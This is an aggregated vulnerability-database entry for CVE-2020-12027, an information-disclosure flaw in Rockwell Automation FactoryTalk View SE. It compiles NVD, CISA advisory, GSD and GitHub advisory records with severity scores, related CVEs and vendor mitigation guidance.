CVE-2020-12027 (GCVE-0-2020-12027)

Vulnerability from cvelistv5 – Published: 2020-07-20 15:13 – Updated: 2024-09-17 04:29

Summary

Severity ?

4.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-200 - EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR CWE-200

Assigner

icscert

References

URL

	Vendor	Product	Version
	Rockwell Automation	FactoryTalk View SE	Affected: all versions

FKIE_CVE-2020-12027

Vulnerability from fkie_nvd - Published: 2020-07-20 16:15 - Updated: 2024-11-21 04:59

Severity ?

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Summary

References

URL	Tags
ics-cert@hq.dhs.gov	http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html	Third Party Advisory, VDB Entry
ics-cert@hq.dhs.gov	https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944	Vendor Advisory
ics-cert@hq.dhs.gov	https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05	Third Party Advisory, US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05	Third Party Advisory, US Government Resource

Impacted products

	Vendor	Product	Version
	rockwellautomation	factorytalk_view	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:se:*:*:*",
              "matchCriteriaId": "4DDF668E-9D30-4588-8897-474014D746A5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs."
    },
    {
      "lang": "es",
      "value": "Todas las versiones de FactoryTalk View SE, divulgan los nombres de host y las rutas de archivos para determinados archivos dentro del sistema. Un atacante remoto y autenticado puede ser capaz de aprovechar esta informaci\u00f3n para los esfuerzos de reconocimiento. Rockwell Automation recomienda habilitar las funciones de seguridad integradas que se encuentran en FactoryTalk View SE. Los usuarios deben seguir la gu\u00eda que se encuentra en los art\u00edculos 109056 y 1126943 de la base de conocimiento para configurar IPSec y/o HTTP"
    }
  ],
  "id": "CVE-2020-12027",
  "lastModified": "2024-11-21T04:59:08.443",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 4.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "ics-cert@hq.dhs.gov",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-07-20T16:15:12.087",
  "references": [
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
    },
    {
      "source": "ics-cert@hq.dhs.gov",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "US Government Resource"
      ],
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
    }
  ],
  "sourceIdentifier": "ics-cert@hq.dhs.gov",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-200"
        }
      ],
      "source": "ics-cert@hq.dhs.gov",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

ICSA-20-170-05

Vulnerability from csaf_cisa - Published: 2020-06-18 00:00 - Updated: 2020-06-18 00:00

Summary

Rockwell Automation FactoryTalk View SE

Notes

CISA Disclaimer

This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov

Legal Notice

All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.

Risk evaluation

Successful exploitation of these vulnerabilities may allow a remote authenticated attacker to manipulate data of affected devices.

Critical infrastructure sectors

Chemical, Commercial Facilities, Critical Manufacturing, Energy, Government Facilities, Water and Wastewater Systems

Countries/areas deployed

Worldwide

Company headquarters location

United States

Recommended Practices

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Recommended Practices

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.

Recommended Practices

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Exploitability

No known public exploits specifically target these vulnerabilities.

JSON

To clipboard

{
  "document": {
    "acknowledgments": [
      {
        "organization": "Rockwell Automation",
        "summary": "reporting these vulnerabilities to CISA"
      },
      {
        "organization": "Trend Micro \u0027s Zero Day Initiative",
        "summary": "reporting these vulnerabilities to CISA"
      }
    ],
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Disclosure is not limited",
      "tlp": {
        "label": "WHITE",
        "url": "https://us-cert.cisa.gov/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
        "title": "CISA Disclaimer"
      },
      {
        "category": "legal_disclaimer",
        "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
        "title": "Legal Notice"
      },
      {
        "category": "summary",
        "text": "Successful exploitation of these vulnerabilities may allow a remote authenticated attacker to manipulate data of affected devices.",
        "title": "Risk evaluation"
      },
      {
        "category": "other",
        "text": "Chemical, Commercial Facilities, Critical Manufacturing, Energy, Government Facilities, Water and Wastewater Systems",
        "title": "Critical infrastructure sectors"
      },
      {
        "category": "other",
        "text": "Worldwide",
        "title": "Countries/areas deployed"
      },
      {
        "category": "other",
        "text": "United States",
        "title": "Company headquarters location"
      },
      {
        "category": "general",
        "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks:",
        "title": "Recommended Practices"
      },
      {
        "category": "other",
        "text": "No known public exploits specifically target these vulnerabilities.",
        "title": "Exploitability"
      }
    ],
    "publisher": {
      "category": "coordinator",
      "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870",
      "name": "CISA",
      "namespace": "https://www.cisa.gov/"
    },
    "references": [
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-20-170-05 JSON",
        "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2020/icsa-20-170-05.json"
      },
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-20-170-05 Web Version",
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-20-170-05"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ncas/tips/ST04-014"
      }
    ],
    "title": "Rockwell Automation FactoryTalk View SE",
    "tracking": {
      "current_release_date": "2020-06-18T00:00:00.000000Z",
      "generator": {
        "engine": {
          "name": "CISA CSAF Generator",
          "version": "1.0.0"
        }
      },
      "id": "ICSA-20-170-05",
      "initial_release_date": "2020-06-18T00:00:00.000000Z",
      "revision_history": [
        {
          "date": "2020-06-18T00:00:00.000000Z",
          "legacy_version": "Initial",
          "number": "1",
          "summary": "Publication Date"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "vers:all/*",
                "product": {
                  "name": " FactoryTalk View SE: All versions",
                  "product_id": "CSAFPID-0001"
                }
              }
            ],
            "category": "product_name",
            "name": "FactoryTalk View SE"
          }
        ],
        "category": "vendor",
        "name": "Rockwell Automation"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2020-12029",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "summary",
          "text": "The affected product does not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE).CVE-2020-12029 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been assigned; the CVSS vector string is (AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12029"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "mitigation",
          "details": "For CVE-2020-12029 Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 - Patch Roll-up for CPR9 SRx.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12031",
      "cwe": {
        "id": "CWE-119",
        "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
      },
      "notes": [
        {
          "category": "summary",
          "text": "After bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution.CVE-2020-12031 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12031"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "mitigation",
          "details": "For CVE-2020-12031 Rockwell Automation recommends applying patch 1126290. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 - Patch Roll-up for CPR9 SRx.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12028",
      "cwe": {
        "id": "CWE-285",
        "name": "Improper Authorization"
      },
      "notes": [
        {
          "category": "summary",
          "text": "A remote, authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions.CVE-2020-12028 has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12028"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "vendor_fix",
          "details": "For CVE-2020-12028 and CVE-2020-12027 Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12027",
      "cwe": {
        "id": "CWE-200",
        "name": "Exposure of Sensitive Information to an Unauthorized Actor"
      },
      "notes": [
        {
          "category": "summary",
          "text": "The affected product discloses the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts.CVE-2020-12027 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12027"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "vendor_fix",
          "details": "For CVE-2020-12028 and CVE-2020-12027 Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    }
  ]
}

GSD-2020-12027

Vulnerability from gsd - Updated: 2023-12-13 01:21

Details

Aliases

CVE-2020-12027

Aliases

CVE-2020-12027

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2020-12027",
    "description": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
    "id": "GSD-2020-12027",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2020-12027"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2020-12027"
      ],
      "details": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
      "id": "GSD-2020-12027",
      "modified": "2023-12-13T01:21:49.470757Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "ics-cert@hq.dhs.gov",
        "DATE_PUBLIC": "2020-06-18T00:00:00.000Z",
        "ID": "CVE-2020-12027",
        "STATE": "PUBLIC",
        "TITLE": "Rockwell Automation FactoryTalk View SE"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "FactoryTalk View SE",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "all versions"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Rockwell Automation"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Trend Micro\u2019s Zero Day Initiative reported these vulnerabilities to Rockwell Automation"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs."
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTOR CWE-200"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05",
            "refsource": "MISC",
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
          },
          {
            "name": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944",
            "refsource": "MISC",
            "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
          },
          {
            "name": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
          }
        ]
      },
      "solution": [
        {
          "lang": "eng",
          "value": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u2019s published guidelines in their security advisory.\nRockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs."
        }
      ],
      "source": {
        "advisory": "ICSA-20-170-05 Rockwell Automation FactoryTalk View SE",
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:rockwellautomation:factorytalk_view:*:*:*:*:se:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2020-12027"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "NVD-CWE-noinfo"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944",
              "refsource": "MISC",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
            },
            {
              "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
            },
            {
              "name": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "NONE",
            "baseScore": 4.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      },
      "lastModifiedDate": "2021-09-23T13:38Z",
      "publishedDate": "2020-07-20T16:15Z"
    }
  }
}

GHSA-6P27-P48F-VH67

Vulnerability from github – Published: 2022-05-24 17:23 – Updated: 2022-05-24 17:23

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2020-12027"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-07-20T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "All versions of FactoryTalk View SE disclose the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts. Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
  "id": "GHSA-6p27-p48f-vh67",
  "modified": "2022-05-24T17:23:58Z",
  "published": "2022-05-24T17:23:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12027"
    },
    {
      "type": "WEB",
      "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
    },
    {
      "type": "WEB",
      "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

CNVD-2020-38419

